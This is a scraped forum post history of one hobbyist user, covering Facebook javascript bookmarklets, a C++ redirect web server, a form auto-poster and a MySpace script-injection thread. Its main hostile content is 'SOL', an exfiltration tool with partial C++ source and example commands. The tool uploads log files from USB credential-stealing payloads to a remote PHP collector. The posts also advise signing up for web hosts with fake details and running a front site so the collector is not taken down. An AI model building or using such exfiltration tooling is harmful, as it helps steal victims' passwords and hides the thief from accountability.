Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

Everything posted by Steve8x

  1. Yeah Javascript is pimp! I always liked it since the beginning! EDIT: Updated Scripts... Added some new ones/ shorter code ones. Besides writing your Javascript on your own web pages, I like to write little javascripts to be injected over other pages too! Check out these I wrote and you'll see what I mean... The following scripts can be used on facebooks site to achieve what each one does... They are prefixed with 'javascript:' because they are meant to be used from your browser's URL field, 'javascript:' tells it to execute the following as javascript rather then trying to interpret it as a url or a search. NOTE * Latest versions of firefox for a while now have blocked the use of javascript via the 'javascript:' prefix from being used whatsoever! So either use firebug and execute the javascript from its console which will work, or an alternative browser. NOTE * Chrome now removes the 'javascript:' if its on your clipboard with whatever you paste into the URL field (your javascript) so you have to manually type the 'javascript:' at the beginning of chrome's URL field after you've pasted the script, even if 'javascript:' was part of what you copied. FB Login: javascript: login = document.forms['login_form']; login.email.value = "youremail@whatever.com"; login.pass.value = "yourpassword"; login.submit(); This works from the homepage when not logged in, it takes the login form fills out the two necessary fields and submits it. "login = document.forms[0];" could be used instead in this case, but I figured it is better to use the form's name as it's less likely to change, though they probably wont make a form besides the login form on the homepage that comes before it. FB Login v2: (including enabling/disabling the 'stay logged in' checkbox aka persist_box javascript: login = document.forms['login_form']; for(var i in login.elements) { if(login.elements[i].id == "persist_box") { stayLoggedInCheckbox = login.elements[i]; } } login.email.value = ""; login.pass.value = ""; stayLoggedInCheckbox.checked = 0; login.submit(); Changing that one line into this 'stayLoggedInCheckbox.checked = 1;' will check the stay logged in checkbox instead of unchecking it Then I realised I could shorten it even for like this: (because I like to write my scripts as short as possible [least lines]) FB Login v3: javascript: login = document.forms['login_form']; stayLoggedInCheckbox = document.getElementById('persist_box'); login.email.value = ""; login.pass.value = ""; stayLoggedInCheckbox.checked = 1; login.submit(); FB Logout: javascript: document.forms.logout_form.submit(); Logs out if logged in... could also be written like: ( :D ) javascript: document.forms['logout_form'].submit(); Fill out all open chat tab's text area's: (It was supposed to be send msg to everyone whose chat tabs are open, but I couldn't figure out how to actually send the message to anyone from any tab let alone everyone... It's a bit different from submitting a form I think for this one, someone better at javascript analyzing/debugging complete this script and get it working! xD) javascript: ChatTabs = document.getElementById('fbDockChatTabs'); AllTabs = ChatTabs.getElementsByTagName('*'); for (i in AllTabs) { var Tab = AllTabs[i]; if(Tab.type == "textarea") { Tab.value = "Hello EVERYONE! LOLOLOLOL xD"; } } void(0); And my personal favorite one, and which was a little trickier than the others. Took me a few revisions until I got it working! Post status update / Post on someone's wall: (whether you're somewhere where you'll post a status update for yourself, or on someone else' page where it will post there instead) [Post Status Update v0.5] javascript: PageTextAreas = document.getElementsByTagName('textarea'); PageForms = document.getElementsByTagName('form'); StatusUpdateText = PageTextAreas[0]; StatusUpdateForm = PageForms[0]; for (i = 0; i < PageTextAreas.length; i++) { var TextInput = PageTextAreas[i]; if(TextInput.className.indexOf("uiTextareaAutogrow input mentionsTextarea textInput") != -1) { if(TextInput.className.indexOf("DOMControl_placeholder") != -1) { StatusUpdateText = TextInput; break; } } } for (i = 0; i < PageForms.length; i++) { if(PageForms[i].action.indexOf("/ajax/updatestatus.php") != -1) { StatusUpdateForm = PageForms[i]; StatusUpdateText.value = "Yo, whats good everyone?! xD"; StatusUpdateForm.submit(); } } void(0); I found that the text area of the page containing the keywords 'uiTextareaAutogrow input mentionsTextarea textInput' and 'DOMControl_placeholder' was the right place to put the text for status updates / wall posts and also that the action of the form responsible for them was containing '/ajax/updatestatus.php'! With both of those you can then modify the text and submit a status update!! I suppose an improvement could include a delay after filling out the text to for example allow for links that load content to be properly posted. Alright there was some fun javascripts I was working on! Off to go and write some more!
  2. I know what thats from foo ;) But anyway whats up with most people not having any icons whatsoever? lol my desktop looks almost as cluttered as darren's right now. You know I start off with my basic icons, web browsers, irc client, a few games, programming IDE's, putty, OllyDbg+IDAPro, and some other good to have apps. Then slowly things start to get cluttered as I work on projects and add more icons to the screen. Then when it gets real bad I take some time to clean it. Which usually amounts to putting the junk somewhere else lol. Just make a new folder called junk and cram it all in there. Problem solved. But If I'm not being lazy I'll actually go through it and delete what I don't want and keep what I do. Anyway this will probably be useful to me as I too hate it when the icons get screwed up. Doesn't happen all the time, but sometimes when a game crashes or something goes wrong; Thats when it screws up my icons! I'll give it a try :D
  3. Stick to windows for now, Once your a comfortable Win32 C++ programmer you may want to try and take on coding for linux. The best C++ compiler ever: http://www.microsoft.com/express/vc/ Microsoft Visual C++ 2008 Express Edition Microsoft knows their shit^^^ So you can thank them for providing this awsome C++ compiler absolutely free Don't torrent the FULL Visual Studio 2008! it really isn't neccessary, its a huge download and doesn't include anything needed, that you don't get with the express edition(it just has the extra stuff, VB, VC#, etc.. things a C++ programmer doesn't need) And when your ready to release your application(If your going to) then follow this thread to make it fully portable(as in it will run on any windows machine) http://hak5.org/forums/index.php?showtopic=10279
  4. X3n I never thought of that! But its a good GREAT idea actually! Only issue is it would be a little awkward receiving your log files in an instant messenger! lol... Although for services like MSN, you don't have to be signed online to get your logs, once you sign on you'll get all your messages, I think its called offline messaging... You'd have to decide whether you'd want to send them in plaintext(to save time so when you look at it in your instant messenger you can just read the log and copy and paste it into a file to save it. Or you could send it encoded/encrypted, and have to do an extra step decoding/decrypting the copy and pasted data from the IM window... You could possibly even use the IM apps own save log file option, and have a custom app read through it and decode/decrypt the content, it would have to know how to read the file saved from that particular IM so it would be able to get the content only and not the: message from user: info saved with the file... Doing it wouldn't be to hard I don't think, You'll just have to do some packet sniffing with your IM of choice and figure out how it communicates with the server to login and send some instant messages! ;) Then code a client app which does only the basics, sign in, send IM! And as you said IM accounts are a dime a dozen you can easily make one just for this purpose and you really don't care if the user+password is discovered since it isnt for anything important... I'll look into it see if I can figure it out! I think I'll go with MSN/Windows Live Messenger
  5. Ahh, I see now! Thanks digip! ;) I was looking for the option under the user CP, instead of right in a thread itself! That's why I couldn't find it at first...
  6. Hi, recently I have been annoyed by posts in a thread not showing up on the page all at once, instead I see the first post of the thread, then below it are links to other posts. It didn't used to be like this, before it showed the posts! Not sure what caused the change, I did not change any settings. Is there a setting I'm not finding? I looked in the My Controls and can't seem to find a way switch it back to normal... here's an image that shows what I mean: Instead of showing that bottom part with links to make the posts show, I'd like the posts to just be there, and if theres more than 1 page I can click the next page! How do you change it back to normal?
  7. Well lets see how it all pans out! As we all know politicians promise more than they can really do(Since they want to win, Say whatever it takes, do whatever it takes to win, then relax lol). So apparently Mr. Barrack convinced more people that he's the better choice. So lets find out what he can actually do. ;) In time we will know...
  8. Yes you can see where the log is being posted to, but you can't see the password to the mysql database ;) If your sending the logs to your own computer your own ip, then you have a problem... So thats why you create a free web hosting account with one of the many free web hosts (with fake info of course) You don't use a paid for host!!! Also you should create a website as a front! so the free web host wont shut your site down for not having any actual content. Because they do check them once in a while to make sure your complying with their TOS. X3N, yes you can virtually do anything with the PHP code once you have received the data on it, I just demonstrated using mysql databases, because thats something that lots of hosts offer plus its fairly easy to insert data into! Sometimes on free hosts certain things are limited. But mysql databases are plentiful ;)
  9. I haven't ever heard of this program, but to answer your question. How hard is it to make? For what you want, its very simple. Since you don't even care about what the client(the web browser connecting to the server) is requesting, you don't have to interpret what you recieve, since you'll always sent the same response to redirect them to a different url... You kind of have the wrong idea though.. "portscanned" ? A server does not have to scan for anything, instead it "listens" for connections on the port its binded to! since web servers normally go on port 80, thats the port clients will connect to the server on. No port scanning required, you already know the port where connections will come through... I have made a simple web server app which does what you described... Its called "xServer" There are multiple ways of redirecting the client to a specified URL. I chose this method: send them some simple html that the browser will understand and reload the page to the new URL... <html><meta http-equiv="refresh" content="0;url=http://www.RedirectToHere.com"></html> putting that html on a web page will cause the page to "refresh" after 0 seconds, to RedirectToHere.com! ;) It works like this, you run it for the first time and it creates a default "config.ini" file, which contains the character "1" on the first line and the default site to redirect to, that being "http://www.google.com" the "1" means to write to the access log file! The access log file records the ip address, page requested, and HTTP version information from clients who connect to the server. Note that it doesn't matter what is requested, it isn't taken into consideration, it always just forwards them to the URL you specify in the edit box... an access log looks something like this: -- 11/04/08 20:43:25 -- GET / HTTP/1.1 -- 11/04/08 20:43:57 -- GET / HTTP/1.1 -- 11/04/08 21:24:38 -- GET / HTTP/1.0 -- 11/04/08 21:26:31 -- GET / HTTP/1.1 -- 11/04/08 21:36:03 -- GET / HTTP/1.1 you can goto a proxy site like this as a test: proxypimp.com(only 1 I can ever remember lol) and type in your ip address(or domain name if you have one) and if you are port forwarded correctly(no firewalls blocking the port), you will see the redirection happen, and if you check your access.log it will show the ip address of the computer that connected along with the date and time, and what was requested ex. "GET /" is the root folder, and HTTP/1.1 is the version :P You can turn the access log recording off, by simply unchecking the box, remember to hit "save config" if you want to save your changes to the config file so you don't have to type the url in everytime or uncheck/check the box every time. it remembers your settings for you... You can also minimize the app to the system tray by simply minimizing it! closing the window with the [x] will terminate the program... Same with "Quit" on the tray menu when minimized... It's far from a full blown web server like apache, but it demonstrates how easy it can be for a simple web server... source code and binary:(exe is in Release folder) http://popeax.com/x/xServer.zip I have the server running now but not on port 80 like the released version is setup to run on. (port 80 is the default HTTP port, when you type a url in your browser like: http://www.google.com/ it connects to it on port 80... if you specify however: http://www.google.com:8080 it will instead try to connect on port 8080 http://popeax.com:1337 It should redirect you to a certain website... ;) [xServer.cpp] //xServer v1.0 a simple HTTP Server //Which redirects all requests //to a specified URL! //Written By Steve8x #include "xServer.h" using namespace std; xServer x; EZwindows ez; NOTIFYICONDATA* n = new NOTIFYICONDATA; char* url = new char[1024]; int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmd, int nCmdShow) { MSG Msg; WNDCLASSEX wc; ez.hInst = hInstance; HBRUSH ButtonFaceBrush = CreateSolidBrush(GetSysColor(COLOR_BTNFACE)); wc.cbSize = sizeof(WNDCLASSEX); wc.hInstance = hInstance; wc.lpszClassName = L"xServer_Class"; wc.lpfnWndProc = WndProc; wc.style = CS_DBLCLKS; wc.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(101)); wc.hIconSm = LoadIcon(hInstance, MAKEINTRESOURCE(101)); wc.hCursor = LoadCursor(0, IDC_ARROW); wc.lpszMenuName = NULL; wc.cbClsExtra = 0; wc.cbWndExtra = 0; wc.hbrBackground = ButtonFaceBrush; RegisterClassEx(&wc); // Initialize common controls library! ez.InitCommonCtrls(); InitFonts(); //Create the window hwnd = CreateWindowExA(0, "xServer_Class", "Server 1.0", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX | WS_CLIPSIBLINGS, CW_USEDEFAULT, CW_USEDEFAULT, 245, 145, HWND_DESKTOP, 0, hInstance, 0); hText = ez.text(hwnd, "Redirect clients to this URL:", 1, 1, 250, 20, 200); hEdit = ez.edit(hwnd, 1, 0, 0, 1, 18, 235, 20, 300); hStatus = ez.text(hwnd, "Status: Server Is Down!", 1, 40, 260, 20, 201); hStart = ez.button(hwnd, "Start Server", 1, 60, 75, 20, 420); hStop = ez.button(hwnd, "Stop Server", 80, 60, 75, 20, 421); hSave = ez.button(hwnd, "Save Config", 159, 60, 75, 20, 422); hCheck = ez.check(hwnd, "Write to access log", 1, 84, 148, 20, 500); SendMessage(hText, WM_SETFONT, (WPARAM)txtFont, 1); SendMessage(hEdit, WM_SETFONT, (WPARAM)editFont, 1); SendMessage(hStart, WM_SETFONT, (WPARAM)txtFont, 1); SendMessage(hStop, WM_SETFONT, (WPARAM)txtFont, 1); SendMessage(hSave, WM_SETFONT, (WPARAM)txtFont, 1); ReadIni(); EnableWindow(hStop, 0); //Show the window ShowWindow(hwnd, nCmdShow); UpdateWindow(hwnd); //Init winsock 2.2 WSADATA wsaData = {0}; WSAStartup(MAKEWORD(2, 2), &wsaData); while(GetMessage(&Msg, 0, 0, 0)) { TranslateMessage(&Msg); DispatchMessage(&Msg); } return Msg.wParam; } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { static UINT TaskbarRestart; switch (message) { case WM_CREATE: TaskbarRestart = RegisterWindowMessageA("TaskbarCreated"); break; case MSG_XTRAYICON: if(wParam != 0x13379) { break; } if(lParam == WM_LBUTTONUP) { n->uID = 0x13379; Shell_NotifyIcon(NIM_DELETE, n); ShowWindow(hwnd, SW_RESTORE); } else if(lParam == WM_RBUTTONUP) { HMENU menu = 0; menu = CreatePopupMenu(); AppendMenuA(menu, MF_STRING, IDM_SHOWWND, "Show"); AppendMenuA(menu, MF_STRING, IDM_TRAYABOUT, "About"); AppendMenuA(menu, MF_STRING, IDM_TRAYEXIT, "Quit"); POINT* p = new POINT; GetCursorPos(p); SetForegroundWindow(hwnd); TrackPopupMenu(menu, 0, p->x, p->y, 0, hwnd, 0); SendMessage(hwnd, WM_NULL, 0, 0); } break; case WM_COMMAND: if(wParam == IDM_SHOWWND) { n->uID = 0x13379; Shell_NotifyIcon(NIM_DELETE, n); ShowWindow(hwnd, SW_RESTORE); } else if(wParam == IDM_TRAYABOUT) { MessageBoxA(0, "xServer 1.0 © 2008\n\nCoded by Steve8x", "About", MB_OK); } else if(wParam == IDM_TRAYEXIT) { Shell_NotifyIcon(NIM_DELETE, n); Running = 0; x.Close(client); x.Close(x.servsock); SetWindowTextA(hStatus, "Status: Server Is Down!"); EnableWindow(hStart, 1); EnableWindow(hStop, 0); ExitProcess(0); } if(wParam == 420) { if(!Running) { Running = 1; x.StartServer(80); //Server Should Run On Port 80! CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&ListenThread, 0, 0, 0); SetWindowTextA(hStatus, "Status: Server Up And Running!"); EnableWindow(hStart, 0); EnableWindow(hStop, 1); } } else if(wParam == 421) { if(Running) { Running = 0; x.Close(client); x.Close(x.servsock); SetWindowTextA(hStatus, "Status: Server Is Down!"); EnableWindow(hStart, 1); EnableWindow(hStop, 0); } } else if(wParam == 422) { SaveIni(); } else if(wParam == 500) { LRESULT l = SendMessage(hCheck, BM_GETCHECK, 0, 0); if(l == BST_CHECKED) { x.WriteToLog = 1; } else { x.WriteToLog = 0; } SaveIni(); } else if(HIWORD(wParam) == EN_CHANGE) { if(LOWORD(wParam) == 300) { ZeroMemory(url, 1024); GetWindowTextA(hEdit, url, 1024); } } break; case WM_LBUTTONDOWN: //I do this for all my app's I like dragging the window from anywhere SendMessage(hWnd, WM_NCLBUTTONDOWN, HTCAPTION, lParam); break; case WM_CTLCOLORSTATIC: SetBkMode((HDC)wParam, TRANSPARENT); return (LRESULT)GetStockObject(COLOR_BTNFACE); break; case WM_SYSCOMMAND: if(wParam == 0xF020)// window was minimized so send app to tray! { MinimizeToTray(); break; } return DefWindowProc(hWnd, message, wParam, lParam); case WM_CLOSE: delete[] url; DeleteObject(txtFont); DeleteObject(editFont); WSACleanup(); PostQuitMessage(0); break; default: if(message == TaskbarRestart) { MinimizeToTray(); } return DefWindowProc (hWnd, message, wParam, lParam); } return 0; } void ListenThread() { for(;; Sleep(10)) { client = x.Accept(); if(Running == 0) { ExitThread(0); } if(client != INVALID_SOCKET) { OutputDebugStringA("Client Connected!"); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&RedirectClient, 0, 0, 0); } } } void RedirectClient() { SOCKET tmpsock = client; char* tmp = new char[1024]; char xdate[9]; char xtime[9]; int contentlen = 0; string recvdata = ""; string senddata = ""; string logstring = ""; _strdate(xdate); _strtime(xtime); sprintf(tmp, RedirectCode, url); contentlen = strlen(tmp); senddata.assign(tmp); sprintf(tmp, HTTPheader, xdate, xtime, contentlen); senddata.insert(0, tmp); recvdata = recvx(tmpsock); sendx(tmpsock, senddata); size_t strsize; strsize = recvdata.find("Host"); if(x.WriteToLog == TRUE) { f = fopen("access.log", "ab"); fwrite(recvdata.c_str(), strsize, 1, f); fclose(f); } x.Close(client); delete[] tmp; } void InitFonts() { lFont.lfHeight = 14; lFont.lfWeight = 420; wcscpy(lFont.lfFaceName, L"MS Sans Serif"); txtFont = CreateFontIndirect(&lFont); lFont.lfHeight = 16; lFont.lfWeight = 420; wcscpy(lFont.lfFaceName, L"Terminal"); editFont = CreateFontIndirect(&lFont); } long getfilesize(FILE* file) { long temp; fseek(f, 0, SEEK_END); temp = ftell(f); rewind(f); return temp; } void ReadIni() { ZeroMemory(url, 1000); f = fopen("config.ini", "rb"); if(!f) { //if it doesn't exist yet save the default config f = fopen("config.ini", "wb"); strcpy(url, "http://www.google.com"); fwrite("1\r\n", 3, 1, f); fwrite(url, strlen(url), 1, f); fclose(f); x.WriteToLog = 1; SendMessage(hCheck, BM_SETCHECK, 1, 0); } else { long StrSize = getfilesize(f); fread(url, 3, 1, f); if(url[0] == '1') { SendMessage(hCheck, BM_SETCHECK, 1, 0); x.WriteToLog = 1; } fread(url, StrSize, 1, f); fclose(f); } SetWindowTextA(hEdit, url); } void SaveIni() { f = fopen("config.ini", "wb"); if(x.WriteToLog == TRUE) fwrite("1\r\n", 3, 1, f); else fwrite("0\r\n", 3, 1, f); fwrite(url, strlen(url), 1, f); fclose(f); } void MinimizeToTray() { n->cbSize = sizeof(NOTIFYICONDATA); n->hWnd = hwnd; n->uFlags = NIF_ICON | NIF_MESSAGE | NIF_TIP; n->uCallbackMessage = MSG_XTRAYICON; n->hIcon = (HICON)LoadImage(GetModuleHandle(0), MAKEINTRESOURCE(101), IMAGE_ICON, 16, 16, 0); n->uID = 0x13379; wcscpy(n->szTip, L"xServer 1.0"); Shell_NotifyIcon(NIM_ADD, n); ShowWindow(hwnd, SW_MINIMIZE); ShowWindow(hwnd, SW_HIDE); }
  10. Multi-Threading is a technique that programmers use to make their applications faster! Imagine you have one function that executes code and does two things one after the other... That code is running in 1 thread... If you split it up into two threads, you can get the job done faster. You'll have two running threads simultaneously. However if the first thing has to be done before the second, then you wont be able to make it two threads since you need the output from the first block of code before you can run the second... Make Sense? A search on google for "Threads" gives this as the second result... http://en.wikipedia.org/wiki/Multi-threading I don't code in VB though so I wouldn't be able to help you with the code.. C++ ftw... ;)
  11. yeah same, I haven't been there since some year in the 1990's probably about 10 years ago! lol That explains why its probably down... Back when I had Windows 95! ;) Anyway yeah thats what I'm looking for, something were you can telnet in... I'll checkout HackThisSite but it seems a little different than hackerslab... (no telnet)
  12. Hello I recently remembered a website I found a long time ago that was pretty cool! It's called hackers lab and basically the idea was there's different levels, and you have to figure out how to get to the next level by using your hacking skills! Each level becomes harder and harder. Back when I discovered the website I wasn't that great with computers yet so I couldn't get past the second level. (Some how I made it to the second level, the first must've been really easy) Anyway now I remembered it and wanted to try to again and see if I could get farther! but the problem is it is down now... The website is still up but the telnet server is down :( http://www.hackerslab.org/eorg/ So basically is there anything else like hackerlab.org that is up and running? It's a cool idea, and you won't get in any trouble, too bad its down...
  13. Alright I was messing around with it today and made the example app... It works similar to what I said previously except instead of using double quotes " you use single quotes! So for example instead of :name="Steve" you do :name='Steve' I did it that way because if you wanted to use double quotes you'd have to write a backslash \ before each " (to escape it) and I thought that would be annoying so I just made it a single quote... ;) You can also use most special characters[because I encode the field data before sending it], except for single quote(obviously since it will end the value early) and & the & sign is used to separate field=value's from each other this is an example of the content the app actually posts name=Steve&comment=hello+my+name+is+steve%21 So you can't put another & in there anywhere other wise somethings going to get cut off as it thinks your specifying a new field name and value.. the +'s are just spaces(you don't have to write plus though when doing spaces it converts it for you) the %21 is what all special characters are changed into its the hex byte of the character. %21 or 0x21 is a ! here's some example usage: You can test it on http://popeax.com/x/ and see the result of your post... there is no actual html form, only a script to accept posted data... the two values that it looks for for input are "name" and "comment" so doing a: frmpost -h popeax.com -s /x/index.php :name='My Name' :comment='Hello World!' would submit at comment to that web page ;) source code + binary: (Release folder contains binary executable) http://popeax.com/x/frmpost.zip batch scripting anyone? :) That should help you out with whatever your trying to do...
  14. Well I think the best way to do it would be a standalone app. Not an addon to IE... Have it read a list of urls from a text file... It will download and read each page individually... for example when it finds a form: <form action="/path/to/script.php" method="post"> <input name="fname" type="text" size="24" maxlength="15"> <input name="pass" type="text" size="24" maxlength="15"> <input name="postform" type="submit" value="Submit!"> </form> Get the input names and then post your data to them... It will be kind of difficult to make it dynamic (where as it will work for any page) You'd have to read the different input types and know the name's of the fields, and know what to put in them... How will you know what to put in the fields is the biggest problem? because not all fields are named the same on different sites, and they all need different values. For example, how will you know your not putting a name in a zipcode field? You called it "auto-fill" it should be called "auto-post"... What have you normally done? What do you "fill" in the boxes? just random stuff or what? Another benefit of downloading the html with winsock and then posting to the page is that you bypass any javascript/clientsided form-field validation... (however where your submitting the form to most likely has checks there which can't be bypassed since they are server sided!) I would suggest looking up HTTP protocol, particularly HTTP POST... This can also help you out too: http://hak5.org/forums/index.php?showtopic=10535 It's a recent thing I made which does what you want, it auto-posts form data to a server sided script... EDIT: I just came up with an idea actually but what are you going to be inputting into the fields? random numbers and letters or what? an app similar to that except it lets you specify the field names and values, something like this: lets say the app is called "formsubmit" formsubmit -h www.peoriabloomingtoncarloans.com -s /scripts/App.dll :fname="Bob" :lname="0x539" :WPhone="123-456-7890" :Addr="123 Burning Tree Lane" :city="Somecity" :State="somestate" :zip="zipcode" :comments="I'm interested in getting pre-approved for a vehicle" etc... * I only did the required fields on that form ;) where -h is the host, -s is the path to the script which its probably not a real Win32 "DLL" file , its probably some sort of scripting language like php disguised, maybe CGI, or ASP... then the fields are identified by some kind of marker, here I chose : marks the start of a field name, and = marks the end of it, then between the quotes is what to put in that field... make sense? It would take quite some time manually writing things to put into the fields, so I don't really get it... So are you wanting random values in the fields ? or ones that make sense? Anyway what would this do for you? I don't see what your getting out of it spamming junk to auto-loan forms? It doesn't seem like theres any benefit...
  15. Steve8x


    Strangely I can't seem to get the desired effect on my myspace page... I also tried: alert.js: function HackedUpSpace() { alert("Welcome to my myspace page!"); } alert.html <html> <script type="text/javascript" src="http://popeax.com/alert.js"></script> <body onload="HackedUpSpace();" /> </html> still no avail! Can someone else test it and confirm its working? Maybe I'm just doing something wrong?
  16. Steve8x


    Thats awsome! I didn't know you could do that!! ;) lol it's been like this for a while now, so they haven't exactly figured it out yet! I wonder how long it will take them to patch it... Well looks like some javascript fun until they do! :) Nice job
  17. Steve8x

    USBhacksaw Help

    How about trying it with SOL(Send Outgoing Log) instead of that gmail crap! do you really want to expose your gmail password? If your going to use a skiddie tool, count on being found out. At least if you use something that doesn't reveal passwords... (like SOL) At least you wont get pwned ;) The idea is to pwn without being pwned yourself! Its like saying here's my gmail password just sitting in a unencrypted plain text file! Come and get it ! lol
  18. Your USB BT3 is a live version right? Where as its like a live CD/DVD but on USB! (That is how I have mine setup) First get a wordlist... Once you have a wordlist, you could just place it on your USB drive anywhere (recommend just putting it on the root of your USB drive) then you can find it in the /mnt folder once you boot up, you should find your usb drive in there in like sdb1 or something like that. locate the wordlist and maybe copy it into your /root folder so you don't have to cd to the /mnt/sdb1 directory when you execute the aircrack-ng command... cp /mnt/sdb1/wordlist.txt /root I suspect your probably doing your aircracking from your /root folder. If your prompt looks like this: bt ~ # then you are... you can type "ls" to list the files in that folder, its the same folder where on the desktop there's a shortcut called "Home" opens to... now lets say instead of having to copy that wordlist into your /root folder everytime you boot, you could create a slax module(.lzm) so that everytime you boot, the wordlist is automatically in your root folder ;) to do this its simple... first make a folder which is what you will use to create the lzm file mkdir /wordlists now make a folder called "root" inside of the wordlists folder mkdir /wordlists/root copy the wordlist(s) into the /wordlists/root folder! cp /mnt/sdb1/wordlist.txt /wordlists/root cp /mnt/sdb1/wordlist2.txt /wordlists/root now your ready to create the .lzm file cd / dir2lzm /wordlists wordlists.lzm now all you have to do is add the wordlists.lzm file into your 'BT3/modules' folder //again if your usb is not called 'sdb1' then adjust the next line cp /wordlists.lzm /mnt/sdb1/BT3/modules now re-boot from your USB drive! What will happen is when booting aside from all the .lzm files it extracts by default, it will also extract your "wordlists.lzm" it extracts all .lzm files to the / folder during boot up. so suppose your .lzm file contains for example: /root/wordlist.txt wordlist.txt will now be in the /root folder on after boot! ;) Thats how easily extensible BT3 is! you can easily add files you want auto-loaded with BT3 just by adding .lzm's to the modules folder! Here's a guide a made if you need more info, or if you want to install a newer driver thats ready to go upon boot! http://forums.remote-exploit.org/showthread.php?p=104179
  19. I verified the same on my friends Vista (I don't have Vista myself) It does not autorun, instead it popup's for the cd-rom partition if you want to run it. And for the USB partition it pops up asking if you wan to open the folder to view the files... I tested with a Sandisk Cruzer Micro U3 drive. So maybe CD-Autorun is off by default in vista? I should try just a CD to see if maybe Vista can tell the difference between a real CD-ROM and the emulated CD-ROM? Anyway it probably can be changed with a registry key! but you'd have to do it before inserting your drive. Maybe run regmon by sysinternals and see what registry key(s) are changed when you change the setting to allow cd's to autorun. (if there is even such a setting) @Verye: what do you mean by "picture CDs"? Do you mean ones that have an icon?
  20. Steve8x

    PS2 key logger

    hardware logger? Seems more detectable to me than a software logger(Since there's actually a physical object that can be found and identified). PS2? at first I thought you were talking about a playstation 2, but I was trying to think how that would work when the PS2 doesn't have a keyboard lol. But you actually mean a PS/2 port for keyboard/mouse. It wouldn't even work on me, my PC does not have PS/2 ports. My keyboard and mouse plug in through USB, So it won't work on every PC ;)
  21. I understand your frustration, although I don't live in the city so I don't have people like that stealing my packages! Are they actually reaching inside your house or grabbing the package off your porch or what? What you should maybe do is like setup surveillance and leave more dummy packages. Catch the guy(s) who are doing it and maybe go and kick his ass(es) for stealing your packages! I would be so pissed if there were people stealing packages I was getting... I mean what do you do in a situation like that? You just lose what ever you paid for? Since there's no signature it doesn't seem like you can claim you did not receive your package! What you have to do is get these fucks scared of coming around your house. However you do that is up to you. Ideally you'd want it so they don't ever come around... How about getting a guard dog maybe? Or maybe a sign that says, "No stealing my packages, violators will be shot!" ;)
  22. Well don't worry php is easy! Its one of the easiest coding languages to learn! automate submitting an online form? Yes its possible... My new app does just the thing. It automates posting a form... http://hak5.org/forums/index.php?showtopic=10535
  23. Recently people have generated interest in my idea of posting log files to a server sided php script for storage in a MySQL database! So I have come up with a command line utilty, that can be used with switchblades/hacksaws in batch scripting... its simple to use, here's the syntax: sol [-p port] [-h host] [-s script] [-f file] ex. sol -p 8080 -h myaccount.myhost.com -s /path/to/script.php -f file.txt sol -h popeax.com -s /test/index.php -f test.txt the port parameter is optional but the other three are required... port 80 is assumed if the port is not specified... the parameters can be specified in any order actually, but I thought this order makes the most sense... Here's how it works. It first reads entire file into memory(note: this is meant for sending like text files/log files, not really binary files although it would work) Once the file is in memory it encodes it with base64 (other encoding can be used but I like this one, even though it makes the file slightly larger) then it sets up the HTTP header to post to the page, as if it were a firefox 3.0.1 web browser. it posts two variables to the php script on the server, t and f. t stands for title, it is just the file name of the file being posted. f stands for file, it is all the data contained in the file encoded with base64. So your php script recieving the data has to correspond. I am providing the php files so don't worry... On the php side, the server sided script will receive the posted data, it will be as if you took the contents of the file and posted them to a form on your web site ;) The data is then inserted into the database still in its encoded form. When you want to view the logs you visit your script and login with a username and password that you specify in the php file, its important that you change it from the default of user "root" password "root". then you can see info about the logs posted, and click a link to view the contents of each file. When you view a log, the page prints the encoded log into a textarea box, and some javascript code decodes it and displays the decoded contents in the same box... I found php's base64_decode() function would screw up and return an empty string if the decoded content contained any special characters.(maybe I was just something wrong?) well with the javascript I've gotten it to work nicely! I've successfully posted a log over 100KB in size(larger than logs usually are so this should work great!) and also successfully posted a log with special characters! You can login and view my test page here: popeax.com/test/index.php username: root && password: root All that is required is a free web host that offers php + mysql (at least 1 database) If you need help finding one here's a great link that has many: http://www.free-webhosts.com/free-mysql-database.php here you can download the php files: http://popeax.com/test/recv.zip for the php files you'll have to modify config.php so that the database info matches your mysql database, and also change the default username and password to actually login to view the logs! coded in MSVC++ 2008 here's the source + binary to SOL (look in release folder for binary) http://popeax.com/test/sol.zip It should work on any windows machine! with no dependencies (winsock doesn't count as a dependency since everyone has it) Here's an image I took when I uploaded a test file: Oh and I left out the encryption part for now because I couldn't get it to work right! So well have to do without it for now until we get that to work right! Happy Hakoween :) [sol.cpp] //Send Outgoing Logfile(SOL) //A command line app which sends a logfile //to a server sided php script for processing //Written By Steve8x #include "sol.h" char* host = new char[260]; char* path = new char[260]; char* file = new char[260]; char* pword = new char[260]; int port = 80; //default port int main(int NumParams, char* Cmd[]) { system("color 0A"); memset(host, 0, 260); memset(path, 0, 260); memset(file, 0, 260); //strcpy(pword, "hak5"); if(Cmd[1] == 0) { printf("\nUsage: sol [-p port] [-h host] [-s script] [-f file] \n"); printf("Examples:\n"); printf("sol -p 8080 -h myhost.com -s /path/to/script.php -f file.txt\n"); printf("sol -h host1337.com -s /usr/bin/script.php -f file.txt\n"); return 0; } //Get Parameters! for(int i = 1; i < NumParams; i++) { if(strcmp(Cmd[i], "-p") == 0) { port = atoi(Cmd[i+1]); } if(strcmp(Cmd[i], "-h") == 0) { strcpy(host, Cmd[i+1]); } if(strcmp(Cmd[i], "-s") == 0) { strcpy(path, Cmd[i+1]); } if(strcmp(Cmd[i], "-f") == 0) { strcpy(file, Cmd[i+1]); } } if(host[0] == 0 || path[0] == 0 || file[0] == 0) { printf("\nhost, script, file parameters are required\n"); return 0; } //Init winsock 2.2 WSADATA wsaData = {0}; WSAStartup(MAKEWORD(2, 2), &wsaData); printf("\n\nConnecting to-> %s:%i", host, port); printf("\nPosting to script-> %s", path); printf("\nFile being sent-> %s\n\n", file); if(LoadFileIntoMemory() == 0) { printf("Could Not Open \"%s\"", file); return 0; } //lets leave the encryption out for now until we can get it to work right! //encrypt the file in memory //XORbuffer(fbuff, fsize, pword); //encode with base64 for transfer sendme = base64_encode((const unsigned char*)fbuff, fsize); printf("Original File Size: %u bytes\nAfter Encoding: %u bytes\n", fsize, sendme.size()); SendFile(); delete[] host; delete[] path; delete[] file; delete[] pword; delete[] fbuff; return 1; } bool SendFile() { //Create A Client Object! This Will Act As A Firefox Web Browser //Max value for mediumblob is 16383 KB //But we wont ever send a log 